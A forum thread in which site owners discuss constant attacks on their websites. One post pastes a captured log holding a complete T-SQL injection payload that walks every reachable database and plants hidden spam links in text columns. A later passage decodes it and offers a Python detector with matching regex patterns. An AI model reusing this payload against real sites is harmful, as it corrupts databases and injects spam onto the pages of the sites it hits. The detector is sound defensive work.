Registered
Join Date: Apr 2000
Location: Mid-life crisis, could be anywhere
Posts: 10,382
Are anyone else's websites under attack?
My websites are under attack on and off continuously. Mostly SQL injection stuff. I invested heavily in defenses, and it's paid off, but wow, it just seems like it never lets up. About 3 1/2 years ago I was attacked by Iranians, bringing down many of my sites. That episode cost me a couple hundred thousand dollars. Sometimes I go a couple weeks without much activity, then it's thousands of attacks over a few days, then it goes quiet again. Please make me feel better and tell me I'm not the only one.
__________________
'95 993 C4 Cabriolet Bunch of motorcycles
Registered
They only attack the best and coolest sites!
__________________
Rutager West 1977 911S Targa Chocolate Brown
Back in the saddle again
Join Date: Oct 2001
Location: Central TX west of Houston
Posts: 55,867
Nope, I'd say that's pretty usual. Good job and congrats on getting your stuff pretty well protected.
__________________
Steve '08 Boxster RS60 Spyder #0099/1960 - never named a car before, but this is Charlotte. '88 targa
Registered
Join Date: Jan 2002
Location: west michigan
Posts: 26,496
|
My computer was under attack from a virus a while back. Had a local guy fix it...cost me $40
__________________
78 SC Targa Black....gone 84 Carrera Targa White 98 Honda Prelude 22 Honda Civic SI
It'll be legen-waitforit
Join Date: Jan 2002
Location: Calgary, Canada
Posts: 6,975
Constant and persistent threats are the new black...
__________________
Bob James 06 Cayman S - Money Penny 18 Macan GTS Gone: 79 911SC, 83 944, 05 Cayenne Turbo, 10 Panamera Turbo
UnRegistered User
Ransomware seems to be the big thing right now.
Registered
Join Date: Jun 2008
Location: Ontario, Canada
Posts: 2,145
SQL injection? What language is the website written in??
Registered User
Join Date: Sep 2012
Location: Växjö Sweden/Hannover Germany
Posts: 1,135
I am running a site/forum on redundant servers located at the company that also hosts IKEA's sites, among others.
My server admin told me the server farm is under constant pressure from the outside. It is like a flood wall holding back the attackers 24/7. If some minor percentage comes through, whole arrays will go down. So no, you are not the only one.
Burn the fire.
My WordPress sites seem to be constantly under assault. If they can't get through they move on.
__________________
[x] Working | [_] Broken: 2017 Victory Octane [x] Working | [_] Broken: 2005 Ram 1500 SLT w/5.7L Hemi "Drive it like you stole it."
The Unsettler
Don't look at your security logs if you ever want to sleep again.
I stopped looking at them a decade ago. I've had a few clients that have freaked out and tried to go nuclear over a single minor breach attempt until I show them the live logs and they realize this stuff is happening 24/7/365. It just never ever ends. Last month I fired up a cloud instance that I needed to run Windows on. Damn thing got compromised in the first 5 minutes before I could even finish hardening it. Most of my stuff runs off Linode these days. One of the advantages is being able to keep multiple distinct public IPs for an instance and swap a clean one in if the primary is being abused. Does not help if they are coming after you based on FQDN though. Which reminds me, I need to run something by you. Been in DC for 3 days, in NJ now and will be in NYC next few days but when I get back I'd appreciate a few minutes of your time if you don't mind.
__________________
"I want my two dollars" "Goodbye and thanks for the fish" "Proud Member and Supporter of the YWL" "Brandon Won"
The Unsettler
Probably like 90% of everything dynamic these days: HTML5, CSS, PHP, jQuery, and SQL on the backend.
__________________
"I want my two dollars" "Goodbye and thanks for the fish" "Proud Member and Supporter of the YWL" "Brandon Won"
Registered
Join Date: Jun 2008
Location: Ontario, Canada
Posts: 2,145
Just managed a project built in Ruby on Rails for the backend and React on the front-end. Chose Rails because I really don't like the inconsistent skill levels with PHP development. Whereas with rails if you follow the conventions it is pretty secure, just harder to find a developer.
PHP developers are a dime a dozen and many won't follow proper conventions. As a language it is getting kinda messy for some web applications. If your project has outsourced PHP, usually the code is the reason for the website being brought down. Ask me how I know! I develop myself in HTML, CSS and jQuery, but am not versed in PHP or SQL, aside from holding together a "legacy" program. I had a new developer start a project in PHP and saw where it was going and how messy/vulnerable the structure was and cancelled. That was when I began looking for Rails. What are your thoughts on Rails as a backend, stomachmonkey? PS. Used postgres for the database on my new program.
Registered
Join Date: Apr 2000
Location: Mid-life crisis, could be anywhere
Posts: 10,382
Quote:
__________________
'95 993 C4 Cabriolet Bunch of motorcycles
Registered
Join Date: Apr 2001
Location: Linn County, Oregon
Posts: 48,512
When the IT guys here start with their jargon, I get instantly lost. Ransomware? Just got a notice from the security service we use giving us a number to call if we get hit with it. Evidently, they've come up with a way to get rid of that form of attack.
Prior to that, I always figured it would be cheaper for me to just buy another computer & start over. Nothing of that much value in our computer anyway. Never posted a credit card number, social security numbers, etc. Still do our finances the old fashioned way...paper. Anybody ever read the O. Henry story titled "Ransom of Red Chief"? Two bums who kidnapped a rich man's son? I always thought that's kind of how I would handle it if hit with ransomware. With no reward, they'd quit picking on me?
__________________
"Now, to put a water-cooled engine in the rear and to have a radiator in the front, that's not very intelligent." -Ferry Porsche (PANO, Oct. '73) (I, Paul D. have loved this quote since 1973. It will remain as long as I post here.) Last edited by pwd72s; 06-23-2016 at 08:09 AM.
Registered
Join Date: Apr 2000
Location: Mid-life crisis, could be anywhere
Posts: 10,382
Appreciate the responses. I guess I'm not the only one, which makes me feel a lot better. Wonder if this situation will get better or worse over time? Seems ridiculous to me.
FWIW, here is a report on one of the attacks from yesterday (one of thousands). I have no idea what this means, but just throwing it out there. I do see "cialis" in the Query String, so I'm assuming it's an attempted server hijack for mass spam emailing.

HTTP_ACCEPT:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_ENCODING:gzip,deflate,gzip, deflate
HTTP_HOST:xxxxxxxx.com
HTTP_REFERER:http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
HTTP_USER_AGENT:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
ALL_RAW
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,gzip, deflate
Host: xxxxxxxx.com
Referer: http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
QUERY_STRING minprice=&maxprice=&bedrrom=&sqft=;declare%20@b%20cursor;declare%20@s%20varchar(8000);declare%20@w%20varchar(99);set%20@b=cursor%20for%20select%20DB_NAME()%20union%20select%20name%20from%20sys.databases%20where%20(has_dbaccess(name)!=0)%20and%20name%20not%20in%20('master','tempdb','model','msdb',DB_NAME());open%20@b;fetch%20next%20from%20@b%20into%20@w;while%20@@FETCH_STATUS=0%20begin%20set%20@s='begin%20try%20use%20'%2B@w%2B';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20''update%20%5B''%2BTABLE_NAME%2B''%5D%20set%20%5B''%2BCOLUMN_NAME%2B''%5D=%5B''%2BCOLUMN_NAME%2B''%5D%2Bcase%20ABS(CHECKSUM(NewId()))%2510%20when%200%20then%20''''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''cialis%20coupon%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''www.cartoninjas.net''%2Bchar(47)%2B''page''%2Bchar(47)%2B''Drug-Prescription-Card%22%20rel=%22nofollow%22''%2Bchar(62)%2B''''''%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''''cialis%20coupon''''%20when%201%20then%20''''cialis%20coupon''''%20else%20''''cialis%20coupon''''%20end%20%2B''''''%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20cialis%20coupon''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''''%20else%20''''''''%20end''%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid%20in%20(0,1))%20and%20DATA_TYPE%20like%20''%25varchar''%20and(CHARACTER_MAXIMUM_LENGTH%20in%20(2147483647,-1));open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c%20end%20try%20begin%20catch%20end%20catch';exec%20(@s);fetch%20next%20from%20@b%20into%20@w;end;close%20@b--&city=
HTTP_REFERER http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
HTTP_USER_AGENT Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
__________________
'95 993 C4 Cabriolet Bunch of motorcycles
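The report pasted above carries one and the same T-SQL payload in three places: the query string (the sqft parameter), the Referer header and the User-Agent header. Decoded, the query-string copy loops over every database the site's login can reach and appends a hidden div with a spam link to every varchar(max) column, which is why "cialis" shows up in it. A detector that only inspects query parameters would therefore miss two of the three vectors. The script below is an added example written for this thread, not the poster's code and not tied to whatever the site actually runs on: it takes CGI-style server variables named like the ones in the report, URL-decodes each query parameter and header (repeating the decode so a double-encoded payload does not slip through), and flags the fields that contain the cursor/declare/exec indicators visible in the log. The sample request is a constructed, heavily shortened stand-in for the pasted one.

```python
"""Flag T-SQL injection payloads in CGI-style request variables.

Added example for this thread (not the original poster's code). Variable names
follow the report pasted above; the sample requests are constructed.
"""
import re
from urllib.parse import unquote, unquote_plus

# Indicators taken from the captured request: a cursor-driven loop that
# enumerates databases, builds UPDATE statements as strings and executes them.
INDICATORS = [
    ("tsql-declare", re.compile(r"\bdeclare\s+@\w+", re.I)),
    ("tsql-cursor", re.compile(r"\bcursor\s+for\b", re.I)),
    ("tsql-sysdb", re.compile(r"\bsys\.databases\b", re.I)),
    ("tsql-exec", re.compile(r"\bexec\s*\(\s*@\w+\s*\)", re.I)),
    ("tsql-fetch", re.compile(r"\bfetch\s+next\s+from\b", re.I)),
    ("sql-comment", re.compile(r"--\s*$")),
    ("stacked-stmt", re.compile(r";\s*(declare|update|exec|select)\b", re.I)),
]


def decode(value: str) -> str:
    """URL-decode a value, repeating for double-encoded payloads until stable."""
    text = unquote_plus(value)
    for _ in range(3):
        nxt = unquote(text)
        if nxt == text:
            break
        text = nxt
    return text


def scan_value(value: str) -> list:
    """Return the labels of every indicator found in one decoded value."""
    text = decode(value)
    return [label for label, rx in INDICATORS if rx.search(text)]


def scan_request(server_vars: dict) -> dict:
    """Map each tainted field to the list of indicators found in it.

    QUERY_STRING is split into parameters on '&' only, so the ';' inside a
    payload stays part of the parameter value; headers are scanned whole.
    """
    findings = {}
    for name, value in server_vars.items():
        if name == "QUERY_STRING":
            for pair in value.split("&"):
                key, _, raw = pair.partition("=")
                hits = scan_value(raw)
                if hits:
                    findings[f"QUERY_STRING[{unquote_plus(key)}]"] = hits
        else:
            hits = scan_value(value)
            if hits:
                findings[name] = hits
    return findings


def should_block(findings: dict, threshold: int = 2) -> bool:
    """Block when any single field shows at least `threshold` distinct indicators."""
    return any(len(hits) >= threshold for hits in findings.values())


# Constructed sample: the same three vectors as the pasted report, payload shortened.
SAMPLE_REQUEST = {
    "HTTP_HOST": "example.com",
    "HTTP_REFERER": (
        "http://google.com;declare @b cursor;declare @s varchar(8000);"
        "set @b=cursor for select name from sys.databases;open @b;"
        "fetch next from @b into @w;exec (@s);close @b--"
    ),
    "HTTP_USER_AGENT": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",
    "QUERY_STRING": (
        "minprice=&maxprice=&bedrrom=&sqft=;declare%20@b%20cursor;"
        "declare%20@s%20varchar(8000);set%20@b=cursor%20for%20select%20name"
        "%20from%20sys.databases;exec%20(@s);close%20@b--&city="
    ),
}

# Constructed benign request against the same search form.
BENIGN_REQUEST = {
    "HTTP_HOST": "example.com",
    "HTTP_REFERER": "http://google.com",
    "HTTP_USER_AGENT": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",
    "QUERY_STRING": "minprice=100&maxprice=500&bedrrom=3&sqft=&city=Austin",
}

if __name__ == "__main__":
    for label, req in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        found = scan_request(req)
        print(label, "block" if should_block(found) else "allow", found)
```

The threshold exists because single indicators such as a trailing `--` or the word `select` turn up in legitimate input; a field that trips several at once is a different matter. Treat this as a detection and logging signal in front of the application, not as the fix: the payload only works if the site concatenates the query string, the Referer or the User-Agent into SQL text, and parameterised queries on the application side remove that possibility regardless of what the scanner catches.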
The Unsettler
I'm assuming this site has some search function?
On my phone so a bit hard to read, but it looks like it's trying to grab all your database tables. Why could be a variety of things.
__________________
"I want my two dollars" "Goodbye and thanks for the fish" "Proud Member and Supporter of the YWL" "Brandon Won"
The Unsettler
Got that part covered, more a viability thing.
__________________
"I want my two dollars" "Goodbye and thanks for the fish" "Proud Member and Supporter of the YWL" "Brandon Won"
The Unsettler
Quote:
I only have two guys I work with when it "matters". I'm less concerned with the language, it's "the guy" that matters. But we also do a lot of hand off work. Meaning build it for the client then they take it over. That kind of dictates to some degree what is used to build their solution. We don't like doing maintenance stuff. I also hate being held hostage by proprietary solutions that keep me tied to certain individuals / groups and take that approach with clients. They are more than welcome to retain us long term but the choice is theirs and the work is done in a way that leaves the choice up to them.
__________________
"I want my two dollars" "Goodbye and thanks for the fish" "Proud Member and Supporter of the YWL" "Brandon Won"
Burn the fire.
What's the consensus on using Cloud Flare as a proxy/screen for these types of attacks?
__________________
[x] Working | [_] Broken: 2017 Victory Octane [x] Working | [_] Broken: 2005 Ram 1500 SLT w/5.7L Hemi "Drive it like you stole it."
Registered
Join Date: Jun 2001
Location: Sweden
Posts: 5,910
Long time ago, when I bothered running my own servers, I had to block whole ranges of Chinese and Russian IP addresses. While it didn't take out all attacks, it surely removed 90% of traffic.
__________________
Thank you for your time,